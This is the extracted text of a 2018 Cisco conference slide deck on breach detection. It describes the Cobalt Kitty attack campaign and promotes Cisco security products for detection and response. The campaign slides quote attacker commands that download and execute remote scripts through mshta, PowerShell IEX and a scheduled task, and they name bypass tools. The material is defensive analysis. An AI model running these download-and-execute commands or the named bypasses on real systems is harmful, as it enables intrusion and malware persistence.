breach detection and mitigation - cisco · 19 - 21 march 2018 | cisco connect | rovinj, croatia...

Breach Detection and Mitigation Practical ExamplesDragan Novakovic

Consulting Systems Engineer

3

19 - 21 March 2018 |��Cisco Connect | Rovinj, Croatia

Challenges Today

Many discrete security productsInformation overload High cost of attacker attributionInefficient breach mitigation process

4


Advanced Adversary

5

• A step below government-sponsored attackers but much more wide spread

• Individuals or organized groups, not governments

• Going after a smaller amount of targets but higher profits per target • Capable of steering

infections individually

• Going after $$ - intellectual property, access and user data

• Sandboxing & Analysis evasion• Misuse of legitimate resources• Low forensic footprint• Layers of scripting• Steganography• Stable C&C

Advanced Attack Commonalities

6

YOU

19 - 21 March 2018 |��Cisco Connect | Rovinj, Croatia 7

From The Trenches: Cobalt Kitty Campaign

§ Well documented campaign

§ Revealing latest attack techniques & tactics

§ Resulted in compromise of domain admin account and sever data breach

Source: https://www2.cybereason.com/asset/60:research-cobalt-kitty-attack-lifecycle

Delivery Exploitation Installation Persistence Lateral Movement Exfiltration



Spear-phishing – email containing links to fake Flash update– Users likely to grant admin rights– Downloads and executes Cobalt Strike Beacon (post exploitation tool)

Microsoft Office Word document with macros– Macro creates simple scheduled tasks using cmd.exe– Windows App Locker script blocking policy bypass using regsvr32.exe

(Metasploit: exploit/windows/misc/regsvr32_applocker_bypass_server)– Run PowerShell with rundll32 to bypass software restrictions

(https://github.com/p3nt4/PowerShdll)

Delivery


schtasks /create /sc MINUTE /tn "Windows Error Reporting" /tr

"mshta.exe about:'<script language=\"vbscript\" src=\“http:xxx/microsoftp.jpg\">code close</script>'"/mo 15 /F


Set objShell = CreateObject(“Wscript.Shell”)intReturn = objShell.Run(“powershell –execute bypass -com”” IEX ((new-object net.webclient).downloadstring (‘hxxp://xx/image.jpg')))

Scheduled Task Creation

Microsoft HTML Application VB Script script execution

Run CMD command in VB

Cobalt Strike Beacon

PowerShell script exec.

Exploitation


From The Trenches: Cobalt Kitty CampaignPersistence Mechanisms

– Windows Scheduled Tasks– Windows Services– Windows Registry Autorun keys

DLL Hijacking– Using legitimate software to execute a

trojanized DLL– Abuses DLL not being there by default OR

search order in which it is loaded

Persistence

Windows Search loading msfte.dll

Google Update loading goopdate.dll


From The Trenches: Cobalt Kitty CampaignFile-less Credentials and Hashed stealing

– Modified version Of Mimikatz (file-less)– Modified version of password file dumper

Lateral Movement– Pass-the-hash and pass-the-ticket attacks– Use of Windows Management Instrumentation

(WMI) for remote execution

Lat. Movement


From The Trenches: Cobalt Kitty CampaignFile-less Scanning Using PowerUp

– Scanning for open ports, vulnerable services and OS fingerprinting using externally hosted Powershell script loaded into memory:

Lat. Movement

Powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://bit.ly/1mK64oH’); Invoke-AllChecks

https://blogs.technet.microsoft.com/heyscriptingguy/2014/03/19/creating-a-port-scanner-with-windows-powershell/https://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/

Powershell Invoke Expression

PowerUp methodFile-less download



C&C and Exfiltration using NetCat, DNS Tunelling & Cobalt Strike Malleable C2

Outlook scripts to send exfiltrated data to Gmail address

Exfiltration

Sends exfiltrated data via email

© 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 14

Sun Tzu, The Art of War

htt

p:/

/ma

xp

ixe

l.fr

ee

gre

atp

ictu

re.c

om

/Mu

se

um

-Sta

tue

-Xia

n-O

ld-C

hin

a-W

arr

iors

-14

45

58

7“The art of war teaches us to rely not on the likelihood of the enemy's not coming, but on our own readiness to receive him”


1. Hinder In-Advance Attack Preparation


1. Hinder In-Advance Attack PreparationüCognitive Treat

Analytics– Internal state– Passive– No feeds


1. Hinder In-Advance Attack PreparationüStealthWatch

– Passive– Lat. Movement– Baselining


2. Deploy Generic C&C Detectors

ü Umbrella Investigate– Predictive algorithms – Automatic takedown– Co-occurrences


2. Deploy Generic C&C Detectorsü Cognitive Threat

Analytics– Uncover entire

infrastructure – Behavior and context– Including low & slow

and steganography-based channels


2. Deploy Generic C&C Detectorsü Encrypted Traffic

Analytics (Stealthwatch)Detects malicious traffic by analyzing: – Initial data packet– hostname– certificate information– supported cipher suites – packet size/timing in TLS-based connections


Because:

Do:§ Collect and have at hand endpoint and network activity logs

3. Stream Endpoint and Network Level Traces

Coding errors happen

Mistakes happen

Detection due to definition update happen


3. Stream Endpoint and Network Level Tracesü AMP for Endpoints

– Collects traces– Retrospection– Root cause analysis– Exploit Prevention– Heuristic Detection


3. Stream Endpoint and Network Level Tracesü StealthWatch

– NetFlow for security


3. Stream Endpoint and Network Level Tracesü Threat Grid

– Global database – Indicators of compromise – Pivoting and context


250+Full Time Threat Intel Researchers

MILLIONSOf Telemetry Agents

1100+Threat Traps

100+Threat Intelligence Partners

THREAT INTEL

1.5 MILLIONDaily Malware Samples

600 BILLIONDaily Email Messages

16 BILLIONDaily Web Requests

Honeypots

Open Source Communities

Vulnerability Discovery (Internal)

Product Telemetry

Internet-Wide Scanning

20 BILLIONThreats Blocked

INTEL SHARING

Customer Data Sharing Programs

Service Provider Coordination Program

Open Source Intel Sharing

3rd Party Programs (MAPP)

Industry Sharing Partnerships (ISACs)

500+Participants

25

4. Use Vendor with Large Threat Research Teamü TALOS


4. Use Vendor with Large Threat Research Teamü TALOS


4. Use Vendor with Large Threat Research Team


5. Deploy Full Detector Stack

More detectors

Complex malware

Bugs, Cost & Risk Increase

FW/NGFW

NGIPS

Antivirus

Reputation/Rules

Policy/Patches

Content Filtering

Sandboxing

Anomaly

Machine Learning


Everything is Configured…Now what?


Breach Detection and Mitigation - Practically!

Breach Detection Immediate Reaction Final ReactionB

reac

h D

etec

tion Detecting a

breachEstablishing priority rating

Imm

edia

te R

eact

ion Following traces

from C&C to a fileEstimating spread on the endpoint and in the networkReviewing related network activity

Fina

l Rea

ctio

n Finding additional malicious activity on the endpointAnalyzing the root causeReimaging the affected endpointsUpdating policies to prevent reinfection


Breach Detection and Mitigation Process

• CTA detects C2 channel (or Umbrella or Investigate or IoC or Talos)

• TG provides global and local file behavior context (endpoint level details)

• AMP identifies files responsible for C&C activity and provides endpoint visibility

• AMP quarantines malicious executables and blocks their further reintroduction

• ISE quarantines the endpoint

• AMP is used for root cause analysis before endpoint is re-imaged

All steps need to be done within hours to prevent data leaks!


Notification About a BreachDaily reports in CTA

Weekly reports in AMP

Too Slow!


Notification About a Breach - Better!§ Subscribe to email alerts

§ Use SIEM for a more granular control


Establishing Priority RatingAMP and Threat Grid Threat prioritization


Establishing Priority RatingCTA Threat prioritization

Low RiskNetwork onlyTry cleanIf failed, monitor

Medium RiskLight infectionTry cleanIf failed, reimage

High RiskBad infectionReimage

Critical RiskData damageQuarantineReimage

Establishing Priority RatingDemo: AMP Event Correlation

Demo: Breach Detection


Step 2:Immediate Reaction

39

Demo: Immediate Reaction


Automatic response with ISE

CTAIncident

ISE

Device

HTTP(S)

Logs

STIX/TAXII

Quarantine


AMP Cloud

NGIPS NGFW

Network AppliancesEndpoints Content Appliances

WWW

WSA ESA

Device Trajectory

Whitelists Blacklists

Customer Specific

42

Block Everywhere - AMP Unity


Step 3:Final Reaction

43

Demo: Final Reaction


Complex Malware Revealed

Powershellprivilege

escalation

Browser extension installation

Stealing browser

credentials

Malware injection

path

Would be prevented by ISE quarantine


Browser Exfiltration Module Revealed

C:/Users/Student1/AppData/Roaming/Mozilla/Firefox/Profiles/…/chrome/content/overlay.js


• AMP for Endpoints• Cognitive Threat Analytics • Threat Grid• StealthWatch• AMP Visibility• ISE

47

Technologies Used

breach detection and mitigation - cisco · 19 - 21 march 2018 | cisco connect | rovinj, croatia...

Documents